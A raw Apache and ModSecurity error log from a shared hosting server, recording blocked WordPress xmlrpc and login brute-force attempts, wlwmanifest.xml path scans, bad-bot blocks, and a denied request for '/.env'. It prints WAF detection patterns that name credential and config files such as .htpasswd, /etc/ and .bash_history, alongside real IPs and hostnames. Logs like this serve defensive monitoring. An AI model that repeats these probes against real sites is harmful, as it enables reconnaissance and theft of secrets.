[Tue May 26 13:38:22.819042 2026] [security2:error] [pid 544395:tid 544610] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU9hmrs7g3RMCdp8XEQAAAAFU"]
[Tue May 26 13:38:23.470778 2026] [security2:error] [pid 536875:tid 537066] [client 146.56.204.198:61844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/h-ui/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahVU9-r_-FTveSGlx1HjnQAAAMI"]
[Tue May 26 13:38:24.807290 2026] [security2:error] [pid 536875:tid 537037] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU-Or_-FTveSGlx1HjsAAAAKU"]
[Tue May 26 13:38:25.956857 2026] [security2:error] [pid 544395:tid 544647] [client 43.173.180.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVU-Rmrs7g3RMCdp8XEfQAAAHo"]
[Tue May 26 13:38:26.344861 2026] [security2:error] [pid 544395:tid 544430] [remote 5.42.158.148:41038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVU-hmrs7g3RMCdp8XEhwAASyI"]
[Tue May 26 13:38:26.367361 2026] [security2:error] [pid 544395:tid 544580] [client 195.178.110.34:51306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVU-hmrs7g3RMCdp8XEiQAAADc"]
[Tue May 26 13:38:26.542071 2026] [security2:error] [pid 536875:tid 537104] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU-ur_-FTveSGlx1HjxwAAAOg"]
[Tue May 26 13:38:28.969730 2026] [security2:error] [pid 536875:tid 537070] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU_Or_-FTveSGlx1Hj7AAAAMY"]
[Tue May 26 13:38:29.488610 2026] [security2:error] [pid 536875:tid 537037] [client 106.192.248.115:60291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU_er_-FTveSGlx1HkAgAAAKU"]
[Tue May 26 13:38:29.488751 2026] [security2:error] [pid 536875:tid 537037] [client 106.192.248.115:60291] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU_er_-FTveSGlx1HkAgAAAKU"]
[Tue May 26 13:38:30.978138 2026] [security2:error] [pid 536875:tid 537118] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU_ur_-FTveSGlx1HkEwAAAPY"]
[Tue May 26 13:38:31.422551 2026] [security2:error] [pid 536875:tid 537028] [client 129.222.147.134:52027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU_-r_-FTveSGlx1HkIQAAAJw"]
[Tue May 26 13:38:31.434358 2026] [security2:error] [pid 536875:tid 537028] [client 129.222.147.134:52027] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU_-r_-FTveSGlx1HkIQAAAJw"]
[Tue May 26 13:38:32.215787 2026] [security2:error] [pid 536875:tid 537019] [client 66.132.195.46:30168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVVAOr_-FTveSGlx1HkKwAAAJM"]
[Tue May 26 13:38:33.210193 2026] [security2:error] [pid 536875:tid 537046] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVAOr_-FTveSGlx1HkOgAAAK4"]
[Tue May 26 13:38:33.733673 2026] [security2:error] [pid 536875:tid 537083] [client 185.191.171.14:38950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahVVAer_-FTveSGlx1HkSAAAANM"]
[Tue May 26 13:38:33.733806 2026] [security2:error] [pid 536875:tid 537083] [client 185.191.171.14:38950] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahVVAer_-FTveSGlx1HkSAAAANM"]
[Tue May 26 13:38:33.931265 2026] [security2:error] [pid 544395:tid 544639] [client 195.178.110.34:36062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVVARmrs7g3RMCdp8XE3gAAAHI"]
[Tue May 26 13:38:34.967033 2026] [security2:error] [pid 536875:tid 537030] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVAur_-FTveSGlx1HkWAAAAJ4"]
[Tue May 26 13:38:35.445545 2026] [fcgid:warn] [pid 536875:tid 537094] (70014)End of file found: [client 66.132.195.92:61276] mod_fcgid: can't get data from http client
[Tue May 26 13:38:37.097483 2026] [security2:error] [pid 544395:tid 544536] [client 170.23.7.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVVBBmrs7g3RMCdp8XE_wAAAAs"]
[Tue May 26 13:38:37.168674 2026] [security2:error] [pid 544395:tid 544644] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVBBmrs7g3RMCdp8XFBgAAAHc"]
[Tue May 26 13:38:37.904061 2026] [security2:error] [pid 544395:tid 544433] [remote 40.77.167.3:53513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-disclaimer.php"] [unique_id "ahVVBRmrs7g3RMCdp8XFIAAAYCU"]
[Tue May 26 13:38:39.220707 2026] [security2:error] [pid 544395:tid 544642] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVBhmrs7g3RMCdp8XFLQAAAHU"]
[Tue May 26 13:38:40.257541 2026] [security2:error] [pid 544395:tid 544643] [client 106.192.248.115:60596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVCBmrs7g3RMCdp8XFQgAAAHY"]
[Tue May 26 13:38:40.257686 2026] [security2:error] [pid 544395:tid 544643] [client 106.192.248.115:60596] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVCBmrs7g3RMCdp8XFQgAAAHY"]
[Tue May 26 13:38:40.728924 2026] [security2:error] [pid 536875:tid 536998] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVCOr_-FTveSGlx1HkrgAA0no"]
[Tue May 26 13:38:40.729119 2026] [security2:error] [pid 536875:tid 537082] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVCOr_-FTveSGlx1HkrgAA0no"]
[Tue May 26 13:38:41.459908 2026] [security2:error] [pid 544395:tid 544578] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVCRmrs7g3RMCdp8XFWwAAADU"]
[Tue May 26 13:38:41.694907 2026] [security2:error] [pid 536875:tid 537019] [client 129.222.147.134:1371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVCer_-FTveSGlx1HkuQAAAJM"]
[Tue May 26 13:38:41.702677 2026] [security2:error] [pid 536875:tid 537019] [client 129.222.147.134:1371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVCer_-FTveSGlx1HkuQAAAJM"]
[Tue May 26 13:38:42.638169 2026] [security2:error] [pid 544395:tid 544586] [client 104.196.167.55:58569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.167.196.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVVChmrs7g3RMCdp8XFdQAAAD0"]
[Tue May 26 13:38:43.025324 2026] [security2:error] [pid 536875:tid 537049] [client 104.196.167.55:62538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVVC-r_-FTveSGlx1Hk2QAAALE"]
[Tue May 26 13:38:43.194937 2026] [security2:error] [pid 536875:tid 537132] [client 72.130.112.27:64238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.112.130.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahVVCur_-FTveSGlx1Hk2AAAAQQ"]
[Tue May 26 13:38:43.195167 2026] [security2:error] [pid 536875:tid 537132] [client 72.130.112.27:64238] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahVVCur_-FTveSGlx1Hk2AAAAQQ"]
[Tue May 26 13:38:43.354352 2026] [security2:error] [pid 536875:tid 537061] [client 104.196.167.55:51575] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVVC-r_-FTveSGlx1Hk5QAAAL0"]
[Tue May 26 13:38:43.368346 2026] [security2:error] [pid 536875:tid 537028] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVCur_-FTveSGlx1Hk1wAAAJw"]
[Tue May 26 13:38:43.673167 2026] [security2:error] [pid 536875:tid 536919] [remote 178.104.90.233:47188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVVC-r_-FTveSGlx1Hk6wAAyys"]
[Tue May 26 13:38:43.778242 2026] [security2:error] [pid 536875:tid 537090] [client 104.196.167.55:58484] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVVC-r_-FTveSGlx1Hk9QAAANo"]
[Tue May 26 13:38:44.202300 2026] [security2:error] [pid 544395:tid 544619] [client 104.196.167.55:58282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDBmrs7g3RMCdp8XFggAAAF4"]
[Tue May 26 13:38:44.611114 2026] [security2:error] [pid 544395:tid 544611] [client 104.196.167.55:61291] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDBmrs7g3RMCdp8XFiQAAAFY"]
[Tue May 26 13:38:44.733053 2026] [security2:error] [pid 536875:tid 537105] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVDOr_-FTveSGlx1Hk_QAAAOk"]
[Tue May 26 13:38:44.953417 2026] [security2:error] [pid 536875:tid 537040] [client 104.196.167.55:50967] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDOr_-FTveSGlx1HlBAAAAKg"]
[Tue May 26 13:38:45.290652 2026] [security2:error] [pid 536875:tid 537049] [client 104.196.167.55:58943] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDer_-FTveSGlx1HlDQAAALE"]
[Tue May 26 13:38:45.646033 2026] [security2:error] [pid 544395:tid 544543] [client 104.196.167.55:64543] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDRmrs7g3RMCdp8XFkgAAABI"]
[Tue May 26 13:38:46.022035 2026] [security2:error] [pid 536875:tid 537107] [client 104.196.167.55:49837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDur_-FTveSGlx1HlFgAAAOs"]
[Tue May 26 13:38:46.301989 2026] [security2:error] [pid 544395:tid 544545] [client 104.196.167.55:50206] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDhmrs7g3RMCdp8XFoAAAABQ"]
[Tue May 26 13:38:46.809794 2026] [security2:error] [pid 544395:tid 544617] [client 104.196.167.55:65106] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVVDhmrs7g3RMCdp8XFpAAAAFw"]
[Tue May 26 13:38:47.373003 2026] [security2:error] [pid 536875:tid 537099] [client 104.196.167.55:54668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pgcsi.org.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVVD-r_-FTveSGlx1HlKgAAAOM"]
[Tue May 26 13:38:47.551796 2026] [security2:error] [pid 544395:tid 544571] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVDxmrs7g3RMCdp8XFqgAAAC4"]
[Tue May 26 13:38:49.522253 2026] [security2:error] [pid 544395:tid 544536] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVERmrs7g3RMCdp8XF1QAAAAs"]
[Tue May 26 13:38:50.490646 2026] [security2:error] [pid 544395:tid 544531] [client 106.192.248.115:60884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVEhmrs7g3RMCdp8XF5AAAAAY"]
[Tue May 26 13:38:50.490770 2026] [security2:error] [pid 544395:tid 544531] [client 106.192.248.115:60884] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVEhmrs7g3RMCdp8XF5AAAAAY"]
[Tue May 26 13:38:51.069210 2026] [security2:error] [pid 536875:tid 537047] [client 199.45.155.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVVEur_-FTveSGlx1HlUwAAAK8"]
[Tue May 26 13:38:51.588151 2026] [security2:error] [pid 536875:tid 537093] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVE-r_-FTveSGlx1HlYgAAAN0"]
[Tue May 26 13:38:52.051508 2026] [security2:error] [pid 536875:tid 536939] [remote 17.241.219.131:34786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.219.241.17.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/tag/trends/"] [unique_id "ahVVE-r_-FTveSGlx1HldwAA6T8"]
[Tue May 26 13:38:52.158056 2026] [security2:error] [pid 544395:tid 544594] [client 129.222.147.134:18099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVExmrs7g3RMCdp8XF9QAAAEU"]
[Tue May 26 13:38:52.158174 2026] [security2:error] [pid 544395:tid 544594] [client 129.222.147.134:18099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVExmrs7g3RMCdp8XF9QAAAEU"]
[Tue May 26 13:38:54.512709 2026] [security2:error] [pid 536875:tid 537071] [client 14.189.116.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVFur_-FTveSGlx1HlnAAAAMc"]
[Tue May 26 13:38:54.992904 2026] [autoindex:error] [pid 544395:tid 544634] [client 146.190.145.39:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:38:55.608583 2026] [security2:error] [pid 544395:tid 544601] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVFxmrs7g3RMCdp8XGMwAAAEw"]
[Tue May 26 13:38:56.847961 2026] [ssl:error] [pid 544395:tid 544592] [client 98.88.137.2:26972] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname webdisk.stvica.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:38:57.175129 2026] [security2:error] [pid 544395:tid 544589] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVGBmrs7g3RMCdp8XGTwAAAEA"]
[Tue May 26 13:38:58.172716 2026] [security2:error] [pid 536875:tid 537011] [client 172.86.122.106:40512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVVGur_-FTveSGlx1Hl1AAAAIs"]
[Tue May 26 13:38:58.410696 2026] [security2:error] [pid 536875:tid 537083] [client 172.86.122.106:40520] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "test.ktmadvance-senegal.com"] [uri "/"] [unique_id "ahVVGur_-FTveSGlx1Hl1wAAANM"]
